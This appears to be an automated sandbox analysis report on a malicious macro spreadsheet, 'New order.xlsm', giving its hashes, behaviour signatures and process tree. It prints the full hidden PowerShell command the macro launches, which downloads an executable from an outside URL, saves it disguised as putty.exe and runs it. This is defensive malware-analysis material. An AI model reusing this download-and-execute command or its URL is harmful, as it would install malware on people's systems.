Analysis
-
max time kernel
144s -
max time network
145s -
platform
windows10_x64 -
resource
win10 -
submitted
09-07-2020 18:32
Static task
static1
Behavioral task
behavioral1
Sample
New order.xlsm
Resource
win7v200430
Behavioral task
behavioral2
Sample
New order.xlsm
Resource
win10
General
-
Target
New order.xlsm
-
Size
92KB
-
MD5
2433e76542036ab53b138a98eeda548a
-
SHA1
fa75a6ce57ec974345eb05a9d5e587a1eef772be
-
SHA256
148a026124126abf74c390c69fbd0bcebce06b600c6a35630cdce29a85a765fc
-
SHA512
3ae2f70b3d39d85d1befea180ee75815abb20349a90cf3678db2e001d5ac362f68230e30680c897e33a05a6dbc1d8a776505751da043797b15327bb38251d243
Malware Config
Extracted
http://sagc.be/svc.exe
Signatures
-
Suspicious use of WriteProcessMemory 5 IoCs
Processes:
EXCEL.EXEpowershell.exedescription pid process target process PID 4092 wrote to memory of 1004 4092 EXCEL.EXE powershell.exe PID 4092 wrote to memory of 1004 4092 EXCEL.EXE powershell.exe PID 1004 wrote to memory of 1568 1004 powershell.exe putty.exe PID 1004 wrote to memory of 1568 1004 powershell.exe putty.exe PID 1004 wrote to memory of 1568 1004 powershell.exe putty.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
Processes:
powershell.exeWerFault.exedescription pid process Token: SeDebugPrivilege 1004 powershell.exe Token: SeRestorePrivilege 3540 WerFault.exe Token: SeBackupPrivilege 3540 WerFault.exe Token: SeDebugPrivilege 3540 WerFault.exe -
Suspicious behavior: EnumeratesProcesses 19 IoCs
Processes:
powershell.exeWerFault.exepid process 1004 powershell.exe 1004 powershell.exe 1004 powershell.exe 3540 WerFault.exe 3540 WerFault.exe 3540 WerFault.exe 3540 WerFault.exe 3540 WerFault.exe 3540 WerFault.exe 3540 WerFault.exe 3540 WerFault.exe 3540 WerFault.exe 3540 WerFault.exe 3540 WerFault.exe 3540 WerFault.exe 3540 WerFault.exe 3540 WerFault.exe 3540 WerFault.exe 3540 WerFault.exe -
Blacklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 9 1004 powershell.exe -
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 3540 1568 WerFault.exe putty.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
EXCEL.EXEpid process 4092 EXCEL.EXE -
Suspicious use of FindShellTrayWindow 2 IoCs
Processes:
EXCEL.EXEpid process 4092 EXCEL.EXE 4092 EXCEL.EXE -
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
powershell.exedescription pid pid_target process target process Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 1004 4092 powershell.exe EXCEL.EXE -
Executes dropped EXE 1 IoCs
Processes:
putty.exepid process 1568 putty.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
EXCEL.EXEdescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
EXCEL.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE -
Suspicious use of SetWindowsHookEx 14 IoCs
Processes:
EXCEL.EXEpid process 4092 EXCEL.EXE 4092 EXCEL.EXE 4092 EXCEL.EXE 4092 EXCEL.EXE 4092 EXCEL.EXE 4092 EXCEL.EXE 4092 EXCEL.EXE 4092 EXCEL.EXE 4092 EXCEL.EXE 4092 EXCEL.EXE 4092 EXCEL.EXE 4092 EXCEL.EXE 4092 EXCEL.EXE 4092 EXCEL.EXE
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\New order.xlsm"1⤵
- Suspicious use of WriteProcessMemory
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of FindShellTrayWindow
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of SetWindowsHookEx
PID:4092 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -W Hidden -command (new-object System.Net.WebClient).DownloadFile('http://sagc.be/svc.exe',$env:Temp+'\putty.exe');(New-Object -com Shell.Application).ShellExecute($env:Temp+'\putty.exe')2⤵
- Suspicious use of WriteProcessMemory
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
- Blacklisted process makes network request
- Process spawned unexpected child process
PID:1004 -
C:\Users\Admin\AppData\Local\Temp\putty.exe"C:\Users\Admin\AppData\Local\Temp\putty.exe"3⤵
- Executes dropped EXE
PID:1568 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1568 -s 8724⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
- Program crash
PID:3540